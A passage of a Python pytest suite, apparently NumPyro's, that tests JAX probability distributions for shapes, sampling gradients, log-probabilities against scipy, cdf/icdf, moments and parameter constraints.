DIRECTIONAL\n)\ndef test_infer_shapes(jax_dist, sp_dist, params):\n shapes = tuple(getattr(p, \"shape\", ()) for p in params)\n shapes = tuple(x() if callable(x) else x for x in shapes)\n jax_dist = jax_dist(*params)\n try:\n 
expected_batch_shape, expected_event_shape = type(jax_dist).infer_shapes(\n *shapes\n )\n except NotImplementedError:\n pytest.skip(f\"{type(jax_dist).__name__}.infer_shapes() is not implemented\")\n assert jax_dist.batch_shape == expected_batch_shape\n assert jax_dist.event_shape == expected_event_shape\n\n\[email protected](\n \"jax_dist, sp_dist, params\", CONTINUOUS + DISCRETE + DIRECTIONAL\n)\ndef test_has_rsample(jax_dist, sp_dist, params):\n jax_dist = jax_dist(*params)\n masked_dist = jax_dist.mask(False)\n indept_dist = jax_dist.expand_by([2]).to_event(1)\n transf_dist = dist.TransformedDistribution(jax_dist, biject_to(constraints.real))\n assert masked_dist.has_rsample == jax_dist.has_rsample\n assert indept_dist.has_rsample == jax_dist.has_rsample\n assert transf_dist.has_rsample == jax_dist.has_rsample\n\n if jax_dist.has_rsample:\n assert isinstance(jax_dist, dist.Delta) or not jax_dist.is_discrete\n if isinstance(jax_dist, dist.TransformedDistribution):\n assert jax_dist.base_dist.has_rsample\n else:\n assert set(jax_dist.arg_constraints) == set(jax_dist.reparametrized_params)\n jax_dist.rsample(random.PRNGKey(0))\n if isinstance(jax_dist, dist.Normal):\n masked_dist.rsample(random.PRNGKey(0))\n indept_dist.rsample(random.PRNGKey(0))\n transf_dist.rsample(random.PRNGKey(0))\n else:\n with pytest.raises(NotImplementedError):\n jax_dist.rsample(random.PRNGKey(0))\n if isinstance(jax_dist, dist.BernoulliProbs):\n with pytest.raises(NotImplementedError):\n masked_dist.rsample(random.PRNGKey(0))\n with pytest.raises(NotImplementedError):\n indept_dist.rsample(random.PRNGKey(0))\n with pytest.raises(NotImplementedError):\n transf_dist.rsample(random.PRNGKey(0))\n\n\[email protected](\"batch_shape\", [(), (4,), (3, 2)])\ndef test_unit(batch_shape):\n log_factor = random.normal(random.PRNGKey(0), batch_shape)\n d = dist.Unit(log_factor=log_factor)\n x = d.sample(random.PRNGKey(1))\n assert x.shape == batch_shape + (0,)\n assert (d.log_prob(x) == log_factor).all()\n\n\[email protected](\"jax_dist, sp_dist, params\", CONTINUOUS)\ndef test_sample_gradient(jax_dist, sp_dist, params):\n # we have pathwise gradient for gamma sampler\n gamma_derived_params = {\n \"Gamma\": [\"concentration\"],\n \"Beta\": [\"concentration1\", \"concentration0\"],\n \"BetaProportion\": [\"mean\", \"concentration\"],\n \"Chi2\": [\"df\"],\n \"Dirichlet\": [\"concentration\"],\n \"InverseGamma\": [\"concentration\"],\n \"LKJ\": [\"concentration\"],\n \"LKJCholesky\": [\"concentration\"],\n \"StudentT\": [\"df\"],\n }.get(jax_dist.__name__, [])\n\n dist_args = [\n p\n for p in (\n inspect.getfullargspec(jax_dist.__init__)[0][1:]\n if inspect.isclass(jax_dist)\n # account the the case jax_dist is a function\n else inspect.getfullargspec(jax_dist)[0]\n )\n ]\n params_dict = dict(zip(dist_args[: len(params)], params))\n\n jax_class = type(jax_dist(**params_dict))\n reparametrized_params = [\n p for p in jax_class.reparametrized_params if p not in gamma_derived_params\n ]\n if not reparametrized_params:\n pytest.skip(\"{} not reparametrized.\".format(jax_class.__name__))\n\n nonrepara_params_dict = {\n k: v for k, v in params_dict.items() if k not in reparametrized_params\n }\n repara_params = tuple(\n v for k, v in params_dict.items() if k in reparametrized_params\n )\n\n rng_key = random.PRNGKey(0)\n\n def fn(args):\n args_dict = dict(zip(reparametrized_params, args))\n return jnp.sum(\n jax_dist(**args_dict, **nonrepara_params_dict).sample(key=rng_key)\n )\n\n actual_grad = jax.grad(fn)(repara_params)\n assert 
len(actual_grad) == len(repara_params)\n\n eps = 1e-3\n for i in range(len(repara_params)):\n if repara_params[i] is None:\n continue\n args_lhs = [p if j != i else p - eps for j, p in enumerate(repara_params)]\n args_rhs = [p if j != i else p + eps for j, p in enumerate(repara_params)]\n fn_lhs = fn(args_lhs)\n fn_rhs = fn(args_rhs)\n # finite diff approximation\n expected_grad = (fn_rhs - fn_lhs) / (2.0 * eps)\n assert jnp.shape(actual_grad[i]) == jnp.shape(repara_params[i])\n assert_allclose(jnp.sum(actual_grad[i]), expected_grad, rtol=0.02, atol=0.03)\n\n\[email protected](\n \"jax_dist, params\",\n [\n (dist.Gamma, (1.0,)),\n (dist.Gamma, (0.1,)),\n (dist.Gamma, (10.0,)),\n (dist.Chi2, (1.0,)),\n (dist.Chi2, (0.1,)),\n (dist.Chi2, (10.0,)),\n (dist.Beta, (1.0, 1.0)),\n (dist.StudentT, (5.0, 2.0, 4.0)),\n ],\n)\ndef test_pathwise_gradient(jax_dist, params):\n rng_key = random.PRNGKey(0)\n N = 1000000\n\n def f(params):\n z = jax_dist(*params).sample(key=rng_key, sample_shape=(N,))\n return (z + z**2).mean(0)\n\n def g(params):\n d = jax_dist(*params)\n return d.mean + d.variance + d.mean**2\n\n actual_grad = grad(f)(params)\n expected_grad = grad(g)(params)\n assert_allclose(actual_grad, expected_grad, rtol=0.005)\n\n\[email protected](\n \"jax_dist, sp_dist, params\", CONTINUOUS + DISCRETE + DIRECTIONAL\n)\ndef test_jit_log_likelihood(jax_dist, sp_dist, params):\n if jax_dist.__name__ in (\n \"EulerMaruyama\",\n \"GaussianRandomWalk\",\n \"_ImproperWrapper\",\n \"LKJ\",\n \"LKJCholesky\",\n \"_SparseCAR\",\n ):\n pytest.xfail(reason=\"non-jittable params\")\n\n rng_key = random.PRNGKey(0)\n samples = jax_dist(*params).sample(key=rng_key, sample_shape=(2, 3))\n\n def log_likelihood(*params):\n return jax_dist(*params).log_prob(samples)\n\n expected = log_likelihood(*params)\n actual = jax.jit(log_likelihood)(*params)\n assert_allclose(actual, expected, atol=2e-5, rtol=2e-5)\n\n\[email protected](\n \"jax_dist, sp_dist, params\", CONTINUOUS + DISCRETE + DIRECTIONAL\n)\[email protected](\"prepend_shape\", [(), (2,), (2, 3)])\[email protected](\"jit\", [False, True])\ndef test_log_prob(jax_dist, sp_dist, params, prepend_shape, jit):\n jit_fn = _identity if not jit else jax.jit\n jax_dist = jax_dist(*params)\n\n rng_key = random.PRNGKey(0)\n samples = jax_dist.sample(key=rng_key, sample_shape=prepend_shape)\n assert jax_dist.log_prob(samples).shape == prepend_shape + jax_dist.batch_shape\n truncated_dists = (\n dist.LeftTruncatedDistribution,\n dist.RightTruncatedDistribution,\n dist.TwoSidedTruncatedDistribution,\n )\n if sp_dist is None:\n if isinstance(jax_dist, truncated_dists):\n if isinstance(params[0], dist.Distribution):\n # new api\n loc, scale, low, high = (\n params[0].loc,\n params[0].scale,\n params[1],\n params[2],\n )\n else:\n # old api\n loc, scale, low, high = params\n if low is None:\n low = -np.inf\n if high is None:\n high = np.inf\n sp_dist = get_sp_dist(type(jax_dist.base_dist))(loc, scale)\n expected = sp_dist.logpdf(samples) - jnp.log(\n sp_dist.cdf(high) - sp_dist.cdf(low)\n )\n assert_allclose(jit_fn(jax_dist.log_prob)(samples), expected, atol=1e-5)\n return\n pytest.skip(\"no corresponding scipy distn.\")\n if _is_batched_multivariate(jax_dist):\n pytest.skip(\"batching not allowed in multivariate distns.\")\n if jax_dist.event_shape and prepend_shape:\n # >>> d = sp.dirichlet([1.1, 1.1])\n # >>> samples = d.rvs(size=(2,))\n # >>> d.logpdf(samples)\n # ValueError: The input vector 'x' must lie within the normal simplex ...\n pytest.skip(\"batched samples cannot 
be scored by multivariate distributions.\")\n sp_dist = sp_dist(*params)\n try:\n expected = sp_dist.logpdf(samples)\n except AttributeError:\n expected = sp_dist.logpmf(samples)\n except ValueError as e:\n # precision issue: jnp.sum(x / jnp.sum(x)) = 0.99999994 != 1\n if \"The input vector 'x' must lie within the normal simplex.\" in str(e):\n samples = jax.device_get(samples).astype(\"float64\")\n samples = samples / samples.sum(axis=-1, keepdims=True)\n expected = sp_dist.logpdf(samples)\n else:\n raise e\n assert_allclose(jit_fn(jax_dist.log_prob)(samples), expected, atol=1e-5)\n\n\ndef test_mixture_log_prob():\n gmm = dist.MixtureSameFamily(\n dist.Categorical(logits=np.zeros(2)), dist.Normal(0, 1).expand([2])\n )\n actual = gmm.log_prob(0.0)\n expected = dist.Normal(0, 1).log_prob(0.0)\n assert_allclose(actual, expected)\n\n\[email protected](\n \"jax_dist, sp_dist, params\",\n # TODO: add more complete pattern for Discrete.cdf\n CONTINUOUS + [T(dist.Poisson, 2.0), T(dist.Poisson, np.array([2.0, 3.0, 5.0]))],\n)\[email protected](\"ignore:overflow encountered:RuntimeWarning\")\ndef test_cdf_and_icdf(jax_dist, sp_dist, params):\n d = jax_dist(*params)\n if d.event_dim > 0:\n pytest.skip(\"skip testing cdf/icdf methods of multivariate distributions\")\n samples = d.sample(key=random.PRNGKey(0), sample_shape=(100,))\n quantiles = random.uniform(random.PRNGKey(1), (100,) + d.shape())\n try:\n rtol = 2e-3 if jax_dist in (dist.Gamma, dist.StudentT) else 1e-5\n if d.shape() == () and not d.is_discrete:\n assert_allclose(\n jax.vmap(jax.grad(d.cdf))(samples),\n jnp.exp(d.log_prob(samples)),\n atol=1e-5,\n rtol=rtol,\n )\n assert_allclose(\n jax.vmap(jax.grad(d.icdf))(quantiles),\n jnp.exp(-d.log_prob(d.icdf(quantiles))),\n atol=1e-5,\n rtol=rtol,\n )\n assert_allclose(d.cdf(d.icdf(quantiles)), quantiles, atol=1e-5, rtol=1e-5)\n assert_allclose(d.icdf(d.cdf(samples)), samples, atol=1e-5, rtol=rtol)\n except NotImplementedError:\n pass\n\n # test against scipy\n if not sp_dist:\n pytest.skip(\"no corresponding scipy distn.\")\n sp_dist = sp_dist(*params)\n try:\n actual_cdf = d.cdf(samples)\n expected_cdf = sp_dist.cdf(samples)\n assert_allclose(actual_cdf, expected_cdf, atol=1e-5, rtol=1e-5)\n actual_icdf = d.icdf(quantiles)\n expected_icdf = sp_dist.ppf(quantiles)\n assert_allclose(actual_icdf, expected_icdf, atol=1e-4, rtol=1e-4)\n except NotImplementedError:\n pass\n\n\[email protected](\"jax_dist, sp_dist, params\", CONTINUOUS + DIRECTIONAL)\ndef test_gof(jax_dist, sp_dist, params):\n if \"Improper\" in jax_dist.__name__:\n pytest.skip(\"distribution has improper .log_prob()\")\n if \"LKJ\" in jax_dist.__name__:\n pytest.xfail(\"incorrect submanifold scaling\")\n if jax_dist is dist.EulerMaruyama:\n d = jax_dist(*params)\n if d.event_dim > 1:\n pytest.skip(\"EulerMaruyama skip test when event shape is non-trivial.\")\n\n num_samples = 10000\n if \"BetaProportion\" in jax_dist.__name__:\n num_samples = 20000\n rng_key = random.PRNGKey(0)\n d = jax_dist(*params)\n samples = d.sample(key=rng_key, sample_shape=(num_samples,))\n probs = np.exp(d.log_prob(samples))\n\n dim = None\n if jax_dist is dist.ProjectedNormal:\n dim = samples.shape[-1] - 1\n\n # Test each batch independently.\n probs = probs.reshape(num_samples, -1)\n samples = samples.reshape(probs.shape + d.event_shape)\n if \"Dirichlet\" in jax_dist.__name__:\n # The Dirichlet density is over all but one of the probs.\n samples = samples[..., :-1]\n for b in range(probs.shape[1]):\n try:\n gof = auto_goodness_of_fit(samples[:, b], 
probs[:, b], dim=dim)\n except InvalidTest:\n pytest.skip(\"expensive test\")\n else:\n assert gof > TEST_FAILURE_RATE\n\n\[email protected](\"jax_dist, sp_dist, params\", CONTINUOUS + DISCRETE)\ndef test_independent_shape(jax_dist, sp_dist, params):\n d = jax_dist(*params)\n batch_shape, event_shape = d.batch_shape, d.event_shape\n shape = batch_shape + event_shape\n for i in range(len(batch_shape)):\n indep = dist.Independent(d, reinterpreted_batch_ndims=i)\n sample = indep.sample(random.PRNGKey(0))\n event_boundary = len(shape) - len(event_shape) - i\n assert indep.batch_shape == shape[:event_boundary]\n assert indep.event_shape == shape[event_boundary:]\n assert jnp.shape(indep.log_prob(sample)) == shape[:event_boundary]\n\n\ndef _tril_cholesky_to_tril_corr(x):\n w = vec_to_tril_matrix(x, diagonal=-1)\n diag = jnp.sqrt(1 - jnp.sum(w**2, axis=-1))\n cholesky = w + jnp.expand_dims(diag, axis=-1) * jnp.identity(w.shape[-1])\n corr = jnp.matmul(cholesky, cholesky.T)\n return matrix_to_tril_vec(corr, diagonal=-1)\n\n\[email protected](\"dimension\", [2, 3, 5])\ndef test_log_prob_LKJCholesky_uniform(dimension):\n # When concentration=1, the distribution of correlation matrices is uniform.\n # We will test that fact here.\n d = dist.LKJCholesky(dimension=dimension, concentration=1)\n N = 5\n corr_log_prob = []\n for i in range(N):\n sample = d.sample(random.PRNGKey(i))\n log_prob = d.log_prob(sample)\n sample_tril = matrix_to_tril_vec(sample, diagonal=-1)\n cholesky_to_corr_jac = np.linalg.slogdet(\n jax.jacobian(_tril_cholesky_to_tril_corr)(sample_tril)\n )[1]\n corr_log_prob.append(log_prob - cholesky_to_corr_jac)\n\n corr_log_prob = np.array(corr_log_prob)\n # test if they are constant\n assert_allclose(\n corr_log_prob,\n jnp.broadcast_to(corr_log_prob[0], corr_log_prob.shape),\n rtol=1e-6,\n )\n\n if dimension == 2:\n # when concentration = 1, LKJ gives a uniform distribution over correlation matrix,\n # hence for the case dimension = 2,\n # density of a correlation matrix will be Uniform(-1, 1) = 0.5.\n # In addition, jacobian of the transformation from cholesky -> corr is 1 (hence its\n # log value is 0) because the off-diagonal lower triangular element does not change\n # in the transform.\n # So target_log_prob = log(0.5)\n assert_allclose(corr_log_prob[0], jnp.log(0.5), rtol=1e-6)\n\n\[email protected](\"dimension\", [2, 3, 5])\[email protected](\"concentration\", [0.6, 2.2])\ndef test_log_prob_LKJCholesky(dimension, concentration):\n # We will test against the fact that LKJCorrCholesky can be seen as a\n # TransformedDistribution with base distribution is a distribution of partial\n # correlations in C-vine method (modulo an affine transform to change domain from (0, 1)\n # to (1, 0)) and transform is a signed stick-breaking process.\n d = dist.LKJCholesky(dimension, concentration, sample_method=\"cvine\")\n\n beta_sample = d._beta.sample(random.PRNGKey(0))\n beta_log_prob = jnp.sum(d._beta.log_prob(beta_sample))\n partial_correlation = 2 * beta_sample - 1\n affine_logdet = beta_sample.shape[-1] * jnp.log(2)\n sample = signed_stick_breaking_tril(partial_correlation)\n\n # compute signed stick breaking logdet\n inv_tanh = lambda t: jnp.log((1 + t) / (1 - t)) / 2 # noqa: E731\n inv_tanh_logdet = jnp.sum(jnp.log(vmap(grad(inv_tanh))(partial_correlation)))\n unconstrained = inv_tanh(partial_correlation)\n corr_cholesky_logdet = biject_to(constraints.corr_cholesky).log_abs_det_jacobian(\n unconstrained, sample\n )\n signed_stick_breaking_logdet = corr_cholesky_logdet + 
inv_tanh_logdet\n\n actual_log_prob = d.log_prob(sample)\n expected_log_prob = beta_log_prob - affine_logdet - signed_stick_breaking_logdet\n assert_allclose(actual_log_prob, expected_log_prob, rtol=2e-5)\n\n assert_allclose(jax.jit(d.log_prob)(sample), d.log_prob(sample), atol=2e-6)\n\n\ndef test_zero_inflated_logits_probs_agree():\n concentration = np.exp(np.random.normal(1))\n rate = np.exp(np.random.normal(1))\n d = dist.GammaPoisson(concentration, rate)\n gate_logits = np.random.normal(0)\n gate_probs = expit(gate_logits)\n zi_logits = dist.ZeroInflatedDistribution(d, gate_logits=gate_logits)\n zi_probs = dist.ZeroInflatedDistribution(d, gate=gate_probs)\n sample = np.random.randint(\n 0,\n 20,\n (\n 1000,\n 100,\n ),\n )\n assert_allclose(zi_probs.log_prob(sample), zi_logits.log_prob(sample))\n\n\[email protected](\"rate\", [0.1, 0.5, 0.9, 1.0, 1.1, 2.0, 10.0])\ndef test_ZIP_log_prob(rate):\n # if gate is 0 ZIP is Poisson\n zip_ = dist.ZeroInflatedPoisson(0.0, rate)\n pois = dist.Poisson(rate)\n s = zip_.sample(random.PRNGKey(0), (20,))\n zip_prob = zip_.log_prob(s)\n pois_prob = pois.log_prob(s)\n assert_allclose(zip_prob, pois_prob, rtol=1e-6)\n\n # if gate is 1 ZIP is Delta(0)\n zip_ = dist.ZeroInflatedPoisson(1.0, rate)\n delta = dist.Delta(0.0)\n s = np.array([0.0, 1.0])\n zip_prob = zip_.log_prob(s)\n delta_prob = delta.log_prob(s)\n assert_allclose(zip_prob, delta_prob, rtol=1e-6)\n\n\[email protected](\"total_count\", [1, 2, 3, 10])\[email protected](\"shape\", [(1,), (3, 1), (2, 3, 1)])\ndef test_beta_binomial_log_prob(total_count, shape):\n concentration0 = np.exp(np.random.normal(size=shape))\n concentration1 = np.exp(np.random.normal(size=shape))\n value = jnp.arange(1 + total_count)\n\n num_samples = 100000\n probs = np.random.beta(concentration1, concentration0, size=(num_samples,) + shape)\n log_probs = dist.Binomial(total_count, probs).log_prob(value)\n expected = logsumexp(log_probs, 0) - jnp.log(num_samples)\n\n actual = dist.BetaBinomial(concentration1, concentration0, total_count).log_prob(\n value\n )\n assert_allclose(actual, expected, rtol=0.02)\n\n\[email protected](\"total_count\", [1, 2, 3, 10])\[email protected](\"batch_shape\", [(1,), (3, 1), (2, 3, 1)])\ndef test_dirichlet_multinomial_log_prob(total_count, batch_shape):\n event_shape = (3,)\n concentration = np.exp(np.random.normal(size=batch_shape + event_shape))\n # test on one-hots\n value = total_count * jnp.eye(event_shape[-1]).reshape(\n event_shape + (1,) * len(batch_shape) + event_shape\n )\n\n num_samples = 100000\n probs = dist.Dirichlet(concentration).sample(random.PRNGKey(0), (num_samples, 1))\n log_probs = dist.Multinomial(total_count, probs).log_prob(value)\n expected = logsumexp(log_probs, 0) - jnp.log(num_samples)\n\n actual = dist.DirichletMultinomial(concentration, total_count).log_prob(value)\n assert_allclose(actual, expected, rtol=0.05)\n\n\[email protected](\"shape\", [(1,), (3, 1), (2, 3, 1)])\ndef test_gamma_poisson_log_prob(shape):\n gamma_conc = np.exp(np.random.normal(size=shape))\n gamma_rate = np.exp(np.random.normal(size=shape))\n value = jnp.arange(15)\n\n num_samples = 300000\n poisson_rate = np.random.gamma(\n gamma_conc, 1 / gamma_rate, size=(num_samples,) + shape\n )\n log_probs = dist.Poisson(poisson_rate).log_prob(value)\n expected = logsumexp(log_probs, 0) - jnp.log(num_samples)\n actual = dist.GammaPoisson(gamma_conc, gamma_rate).log_prob(value)\n assert_allclose(actual, expected, rtol=0.05)\n\n\[email protected](\n \"jax_dist, sp_dist, params\", CONTINUOUS + 
DISCRETE + DIRECTIONAL\n)\ndef test_log_prob_gradient(jax_dist, sp_dist, params):\n if jax_dist in [dist.LKJ, dist.LKJCholesky]:\n pytest.skip(\"we have separated tests for LKJCholesky distribution\")\n if jax_dist is _ImproperWrapper:\n pytest.skip(\"no param for ImproperUniform to test for log_prob gradient\")\n\n rng_key = random.PRNGKey(0)\n value = jax_dist(*params).sample(rng_key)\n\n def fn(*args):\n return jnp.sum(jax_dist(*args).log_prob(value))\n\n eps = 1e-3\n for i in range(len(params)):\n if jax_dist is dist.EulerMaruyama and i == 1:\n # skip taking grad w.r.t. sde_fn\n continue\n if jax_dist is _SparseCAR and i == 3:\n # skip taking grad w.r.t. adj_matrix\n continue\n if isinstance(\n params[i], dist.Distribution\n ): # skip taking grad w.r.t. base_dist\n continue\n if params[i] is None or jnp.result_type(params[i]) in (jnp.int32, jnp.int64):\n continue\n actual_grad = jax.grad(fn, i)(*params)\n args_lhs = [p if j != i else p - eps for j, p in enumerate(params)]\n args_rhs = [p if j != i else p + eps for j, p in enumerate(params)]\n fn_lhs = fn(*args_lhs)\n fn_rhs = fn(*args_rhs)\n # finite diff approximation\n expected_grad = (fn_rhs - fn_lhs) / (2.0 * eps)\n assert jnp.shape(actual_grad) == jnp.shape(params[i])\n if i == 0 and jax_dist is dist.Delta:\n # grad w.r.t. `value` of Delta distribution will be 0\n # but numerical value will give nan (= inf - inf)\n expected_grad = 0.0\n assert_allclose(jnp.sum(actual_grad), expected_grad, rtol=0.01, atol=0.01)\n\n\[email protected](\n \"jax_dist, sp_dist, params\", CONTINUOUS + DISCRETE + DIRECTIONAL\n)\ndef test_mean_var(jax_dist, sp_dist, params):\n if jax_dist is _ImproperWrapper:\n pytest.skip(\"Improper distribution does not has mean/var implemented\")\n if jax_dist is FoldedNormal:\n pytest.skip(\"Folded distribution does not has mean/var implemented\")\n if jax_dist is dist.EulerMaruyama:\n pytest.skip(\"EulerMaruyama distribution does not has mean/var implemented\")\n if jax_dist is dist.RelaxedBernoulliLogits:\n pytest.skip(\"RelaxedBernoulli distribution does not has mean/var implemented\")\n if \"SineSkewed\" in jax_dist.__name__:\n pytest.skip(\"Skewed Distribution are not symmetric about location.\")\n if jax_dist in (\n _TruncatedNormal,\n _TruncatedCauchy,\n dist.LeftTruncatedDistribution,\n dist.RightTruncatedDistribution,\n dist.TwoSidedTruncatedDistribution,\n ):\n pytest.skip(\"Truncated distributions do not has mean/var implemented\")\n if jax_dist is dist.ProjectedNormal:\n pytest.skip(\"Mean is defined in submanifold\")\n\n n = (\n 20000\n if jax_dist in [dist.LKJ, dist.LKJCholesky, dist.SineBivariateVonMises]\n else 200000\n )\n d_jax = jax_dist(*params)\n k = random.PRNGKey(0)\n samples = d_jax.sample(k, sample_shape=(n,)).astype(np.float32)\n # check with suitable scipy implementation if available\n # XXX: VonMises is already tested below\n if (\n sp_dist\n and not _is_batched_multivariate(d_jax)\n and jax_dist\n not in [dist.VonMises, dist.MultivariateStudentT, dist.MatrixNormal]\n ):\n d_sp = sp_dist(*params)\n try:\n sp_mean = d_sp.mean()\n except TypeError: # mvn does not have .mean() method\n sp_mean = d_sp.mean\n # for multivariate distns try .cov first\n if d_jax.event_shape:\n try:\n sp_var = jnp.diag(d_sp.cov())\n except TypeError: # mvn does not have .cov() method\n sp_var = jnp.diag(d_sp.cov)\n except AttributeError:\n sp_var = d_sp.var()\n else:\n sp_var = d_sp.var()\n assert_allclose(d_jax.mean, sp_mean, rtol=0.01, atol=1e-7)\n assert_allclose(d_jax.variance, sp_var, rtol=0.01, atol=1e-7)\n if 
jnp.all(jnp.isfinite(sp_mean)):\n assert_allclose(jnp.mean(samples, 0), d_jax.mean, rtol=0.05, atol=1e-2)\n if jnp.all(jnp.isfinite(sp_var)):\n assert_allclose(\n jnp.std(samples, 0), jnp.sqrt(d_jax.variance), rtol=0.05, atol=1e-2\n )\n elif jax_dist in [dist.LKJ, dist.LKJCholesky]:\n if jax_dist is dist.LKJCholesky:\n corr_samples = jnp.matmul(samples, jnp.swapaxes(samples, -2, -1))\n else:\n corr_samples = samples\n dimension, concentration, _ = params\n # marginal of off-diagonal entries\n marginal = dist.Beta(\n concentration + 0.5 * (dimension - 2), concentration + 0.5 * (dimension - 2)\n )\n # scale statistics due to linear mapping\n marginal_mean = 2 * marginal.mean - 1\n marginal_std = 2 * jnp.sqrt(marginal.variance)\n expected_mean = jnp.broadcast_to(\n jnp.reshape(marginal_mean, jnp.shape(marginal_mean) + (1, 1)),\n jnp.shape(marginal_mean) + d_jax.event_shape,\n )\n expected_std = jnp.broadcast_to(\n jnp.reshape(marginal_std, jnp.shape(marginal_std) + (1, 1)),\n jnp.shape(marginal_std) + d_jax.event_shape,\n )\n # diagonal elements of correlation matrices are 1\n expected_mean = expected_mean * (1 - jnp.identity(dimension)) + jnp.identity(\n dimension\n )\n expected_std = expected_std * (1 - jnp.identity(dimension))\n\n assert_allclose(jnp.mean(corr_samples, axis=0), expected_mean, atol=0.01)\n assert_allclose(jnp.std(corr_samples, axis=0), expected_std, atol=0.01)\n elif jax_dist in [dist.VonMises]:\n # circular mean = sample mean\n assert_allclose(d_jax.mean, jnp.mean(samples, 0), rtol=0.05, atol=1e-2)\n\n # circular variance\n x, y = jnp.mean(jnp.cos(samples), 0), jnp.mean(jnp.sin(samples), 0)\n\n expected_variance = 1 - jnp.sqrt(x**2 + y**2)\n assert_allclose(d_jax.variance, expected_variance, rtol=0.05, atol=1e-2)\n elif jax_dist in [dist.SineBivariateVonMises]:\n phi_loc = _circ_mean(samples[..., 0])\n psi_loc = _circ_mean(samples[..., 1])\n\n assert_allclose(\n d_jax.mean, jnp.stack((phi_loc, psi_loc), axis=-1), rtol=0.05, atol=1e-2\n )\n elif jax_dist in [dist.MatrixNormal]:\n sample_shape = (200_000,)\n # use X ~ MN(loc, U, V) then vec(X) ~ MVN(vec(loc), kron(V, U))\n if len(d_jax.batch_shape) > 0:\n axes = [len(sample_shape) + i for i in range(len(d_jax.batch_shape))]\n axes = tuple(axes)\n samples_re = jnp.moveaxis(samples, axes, jnp.arange(len(axes)))\n subshape = samples_re.shape[: len(axes)]\n ixi = product(*[range(k) for k in subshape])\n for ix in ixi:\n # mean\n def get_min_shape(ix, batch_shape):\n return min(ix, tuple(map(lambda x: x - 1, batch_shape)))\n\n ix_loc = get_min_shape(ix, d_jax.loc.shape[: len(ix)])\n jnp.allclose(\n jnp.mean(samples_re[ix], 0),\n jnp.squeeze(d_jax.mean[ix_loc]),\n rtol=0.5,\n atol=1e-2,\n )\n # cov\n samples_mvn = jnp.squeeze(samples_re[ix]).reshape(\n sample_shape + (-1,), order=\"F\"\n )\n ix_col = get_min_shape(ix, d_jax.scale_tril_column.shape[: len(ix)])\n ix_row = get_min_shape(ix, d_jax.scale_tril_row.shape[: len(ix)])\n scale_tril = my_kron(\n d_jax.scale_tril_column[ix_col],\n d_jax.scale_tril_row[ix_row],\n )\n sample_scale_tril = jnp.linalg.cholesky(jnp.cov(samples_mvn.T))\n jnp.allclose(sample_scale_tril, scale_tril, atol=0.5, rtol=1e-2)\n else: # unbatched\n # mean\n jnp.allclose(\n jnp.mean(samples, 0),\n jnp.squeeze(d_jax.mean),\n rtol=0.5,\n atol=1e-2,\n )\n # cov\n samples_mvn = jnp.squeeze(samples).reshape(sample_shape + (-1,), order=\"F\")\n scale_tril = my_kron(\n jnp.squeeze(d_jax.scale_tril_column), jnp.squeeze(d_jax.scale_tril_row)\n )\n sample_scale_tril = jnp.linalg.cholesky(jnp.cov(samples_mvn.T))\n 
jnp.allclose(sample_scale_tril, scale_tril, atol=0.5, rtol=1e-2)\n else:\n if jnp.all(jnp.isfinite(d_jax.mean)):\n assert_allclose(jnp.mean(samples, 0), d_jax.mean, rtol=0.05, atol=1e-2)\n if isinstance(d_jax, dist.CAR):\n pytest.skip(\"CAR distribution does not have `variance` implemented.\")\n if isinstance(d_jax, dist.Gompertz):\n pytest.skip(\"Gompertz distribution does not have `variance` implemented.\")\n if jnp.all(jnp.isfinite(d_jax.variance)):\n assert_allclose(\n jnp.std(samples, 0), jnp.sqrt(d_jax.variance), rtol=0.05, atol=1e-2\n )\n\n\[email protected](\n \"jax_dist, sp_dist, params\", CONTINUOUS + DISCRETE + DIRECTIONAL\n)\[email protected](\"prepend_shape\", [(), (2,), (2, 3)])\ndef test_distribution_constraints(jax_dist, sp_dist, params, prepend_shape):\n if jax_dist in (\n _TruncatedNormal,\n _TruncatedCauchy,\n _GaussianMixture,\n _Gaussian2DMixture,\n _GeneralMixture,\n _General2DMixture,\n ):\n pytest.skip(f\"{jax_dist.__name__} is a function, not a class\")\n dist_args = [p for p in inspect.getfullargspec(jax_dist.__init__)[0][1:]]\n\n valid_params, oob_params = list(params), list(params)\n key = random.PRNGKey(1)\n dependent_constraint = False\n for i in range(len(params)):\n if (\n jax_dist in (_ImproperWrapper, dist.LKJ, dist.LKJCholesky)\n and dist_args[i] != \"concentration\"\n ):\n continue\n if \"SineSkewed\" in jax_dist.__name__ and dist_args[i] != \"skewness\":\n continue\n if jax_dist is dist.EulerMaruyama and dist_args[i] != \"t\":\n continue\n if (\n jax_dist is dist.TwoSidedTruncatedDistribution\n and dist_args[i] == \"base_dist\"\n ):\n continue\n if jax_dist is dist.GaussianRandomWalk and dist_args[i] == \"num_steps\":\n continue\n if (\n jax_dist is dist.SineBivariateVonMises\n and dist_args[i] == \"weighted_correlation\"\n ):\n continue\n if params[i] is None:\n oob_params[i] = None\n valid_params[i] = None\n continue\n constraint = jax_dist.arg_constraints[dist_args[i]]\n if isinstance(constraint, constraints._Dependent):\n dependent_constraint = True\n break\n key, key_gen = random.split(key)\n oob_params[i] = gen_values_outside_bounds(\n constraint, jnp.shape(params[i]), key_gen\n )\n valid_params[i] = gen_values_within_bounds(\n constraint, jnp.shape(params[i]), key_gen\n )\n if jax_dist is dist.MultivariateStudentT:\n # As mean is only defined for df > 1 & we instantiate\n # scipy.stats.multivariate_t with same mean as jax_dist\n # we need to ensure this is defined, so force df >= 1\n valid_params[0] += 1\n\n if jax_dist is dist.LogUniform:\n # scipy.stats.loguniform take parameter a and b\n # which is a > 0 and b > a.\n # gen_values_within_bounds() generates just\n # a > 0 and b > 0. 
Then, make b = a + b.\n valid_params[1] += valid_params[0]\n\n assert jax_dist(*oob_params)\n\n # Invalid parameter values throw ValueError\n if not dependent_constraint and (\n jax_dist is not _ImproperWrapper and \"SineSkewed\" not in jax_dist.__name__\n ):\n with pytest.raises(ValueError):\n jax_dist(*oob_params, validate_args=True)\n\n with pytest.raises(ValueError):\n # test error raised under jit omnistaging\n oob_params = jax.device_get(oob_params)\n\n def dist_gen_fn():\n d = jax_dist(*oob_params, validate_args=True)\n return d\n\n jax.jit(dist_gen_fn)()\n\n d = jax_dist(*valid_params, validate_args=True)\n\n # Test agreement of log density evaluation on randomly generated samples\n # with scipy's implementation when available.\n if (\n sp_dist\n and not _is_batched_multivariate(d)\n and not (d.event_shape and prepend_shape)\n ):\n valid_samples = gen_values_within_bounds(\n d.support, size=prepend_shape + d.batch_shape + d.event_shape\n )\n try:\n expected = sp_dist(*valid_params).logpdf(valid_samples)\n except AttributeError:\n expected = sp_dist(*valid_params).logpmf(valid_samples)\n assert_allclose(d.log_prob(valid_samples), expected, atol=1e-5, rtol=1e-5)\n\n # Out of support samples throw 